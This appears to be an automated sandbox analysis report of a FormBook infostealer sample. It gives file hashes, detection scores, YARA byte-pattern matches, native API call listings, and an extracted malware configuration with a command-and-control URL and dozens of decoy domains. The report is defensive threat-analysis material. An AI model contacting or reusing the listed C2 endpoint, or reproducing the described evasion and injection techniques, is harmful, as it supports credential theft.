Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Zusy.394472.15672.20727

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Zusy.394472.15672.20727 (renamed file extension from 20727 to exe)
Analysis ID:452434
MD5:89cfb542cda6a428cc5c02feaf3c55f8
SHA1:9a0606c633ffe5ae4b6dcb7dcfba57b7e22cb05d
SHA256:b663fea76aadbf574e5bb9f704ad689ec10f0d720b0b9641e70b27494fe4cc17
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yjhlgg.com/grve/"], "decoy": ["jrvinganimalexterminator.com", "smallsyalls.com", "po1c3.com", "mencg.com", "aussieenjoyment.today", "espace22.com", "aanmelding-desk.info", "gallopshoes.com", "nftsexy.com", "ricosdulcesmexicanos.com", "riseswift.com", "thechicthirty.com", "matdcg.com", "alternet.today", "creativehuesdesigns.com", "rjkcrafts.com", "lowdosemortgage.com", "adoptahamster.com", "wellness-sense.com", "jacardcapital.com", "pastiindonesia.com", "lindsaynathan2021.com", "brisbanemagicians.com", "tvglanz.com", "388384.com", "mitgrim.com", "endonelatrading.com", "political.singles", "ganjegirls.com", "democratscancelled.com", "ytzhubao.com", "roiskylands.com", "zamlgroup.com", "winstonsalemathleticclub.com", "62qtz2.com", "caddyys.com", "ecorarte.com", "coonier.com", "cbgmanhattan-hub.com", "givanon.com", "tioniis11.com", "variceselite.com", "tasaciona.com", "hiphopeconomicdevelopment.com", "citrixfile.com", "piebuilder.com", "drmetalpublishing.com", "themesthatyoulike.com", "vinhomes-phamhung.info", "ardecentro.com", "gameshowsatwork.com", "go-rillathebrand.com", "virtualppo.com", "nogodbeforeme.net", "fabrezeairpurifiers.com", "roorisor.com", "elaraberentcar.com", "rugpat.com", "renewalbyheather.com", "innocox.com", "ztsj10086.com", "channelarmor.info", "thecarbonbox.store", "edicionesvita.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.yjhlgg.com/grve/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yjhlgg.com/grve/"], "decoy": ["jrvinganimalexterminator.com", "smallsyalls.com", "po1c3.com", "mencg.com", "aussieenjoyment.today", "espace22.com", "aanmelding-desk.info", "gallopshoes.com", "nftsexy.com", "ricosdulcesmexicanos.com", "riseswift.com", "thechicthirty.com", "matdcg.com", "alternet.today", "creativehuesdesigns.com", "rjkcrafts.com", "lowdosemortgage.com", "adoptahamster.com", "wellness-sense.com", "jacardcapital.com", "pastiindonesia.com", "lindsaynathan2021.com", "brisbanemagicians.com", "tvglanz.com", "388384.com", "mitgrim.com", "endonelatrading.com", "political.singles", "ganjegirls.com", "democratscancelled.com", "ytzhubao.com", "roiskylands.com", "zamlgroup.com", "winstonsalemathleticclub.com", "62qtz2.com", "caddyys.com", "ecorarte.com", "coonier.com", "cbgmanhattan-hub.com", "givanon.com", "tioniis11.com", "variceselite.com", "tasaciona.com", "hiphopeconomicdevelopment.com", "citrixfile.com", "piebuilder.com", "drmetalpublishing.com", "themesthatyoulike.com", "vinhomes-phamhung.info", "ardecentro.com", "gameshowsatwork.com", "go-rillathebrand.com", "virtualppo.com", "nogodbeforeme.net", "fabrezeairpurifiers.com", "roorisor.com", "elaraberentcar.com", "rugpat.com", "renewalbyheather.com", "innocox.com", "ztsj10086.com", "channelarmor.info", "thecarbonbox.store", "edicionesvita.com"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.yjhlgg.com/grve/Virustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeVirustotal: Detection: 51%Perma Link
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeMetadefender: Detection: 22%Perma Link
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeReversingLabs: Detection: 60%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeJoe Sandbox ML: detected
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.5c0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.639462821.00000000023F0000.00000004.00000001.sdmp, SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 4x nop then pop edi3_2_0040E376
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 4x nop then pop edi3_2_0040E37A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 4x nop then pop edi3_2_0040E3C8

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.yjhlgg.com/grve/
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000002.644990740.000000000063A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419DFB NtReadFile,3_2_00419DFB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419E7A NtClose,3_2_00419E7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00419F2A NtAllocateVirtualMemory,3_2_00419F2A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A29660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A29860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2B040 NtSuspendThread,3_2_00A2B040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2A3B0 NtGetContextThread,3_2_00A2A3B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A295F0 NtQueryInformationFile,3_2_00A295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A295D0 NtClose,3_2_00A295D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29520 NtWaitForSingleObject,3_2_00A29520
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29560 NtWriteFile,3_2_00A29560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29540 NtReadFile,3_2_00A29540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A296D0 NtCreateKey,3_2_00A296D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29610 NtEnumerateValueKey,3_2_00A29610
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29670 NtQueryInformationProcess,3_2_00A29670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29650 NtQueryValueKey,3_2_00A29650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A297A0 NtUnmapViewOfSection,3_2_00A297A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29780 NtMapViewOfSection,3_2_00A29780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29730 NtQueryVirtualMemory,3_2_00A29730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29710 NtQueryInformationToken,3_2_00A29710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2A710 NtOpenProcessToken,3_2_00A2A710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29760 NtOpenProcess,3_2_00A29760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2A770 NtOpenThread,3_2_00A2A770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29770 NtSetInformationFile,3_2_00A29770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A298A0 NtWriteVirtualMemory,3_2_00A298A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A298F0 NtReadVirtualMemory,3_2_00A298F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29820 NtEnumerateKey,3_2_00A29820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29840 NtDelayExecution,3_2_00A29840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A299A0 NtCreateSection,3_2_00A299A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A299D0 NtCreateProcessEx,3_2_00A299D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29910 NtAdjustPrivilegesToken,3_2_00A29910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29950 NtQueueApcThread,3_2_00A29950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29A80 NtOpenDirectoryObject,3_2_00A29A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29A20 NtResumeThread,3_2_00A29A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29A00 NtProtectVirtualMemory,3_2_00A29A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29A10 NtQuerySection,3_2_00A29A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29A50 NtCreateFile,3_2_00A29A50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29B00 NtSetValueKey,3_2_00A29B00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2AD30 NtSetContextThread,3_2_00A2AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A29FE0 NtCreateMutant,3_2_00A29FE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041D18D3_2_0041D18D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041E20E3_2_0041E20E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00409E2C3_2_00409E2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00409E303_2_00409E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041DFA83_2_0041DFA8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A03_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB20A83_2_00AB20A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB0903_2_009FB090
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA60F53_2_00AA60F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA10023_2_00AA1002
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FC1C03_2_009FC1C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A041203_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB32A93_2_00AB32A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB22AE3_2_00AB22AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAE2C53_2_00AAE2C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B2363_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C225E3_2_009C225E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C33823_2_009C3382
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E33_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA03DA3_2_00AA03DA
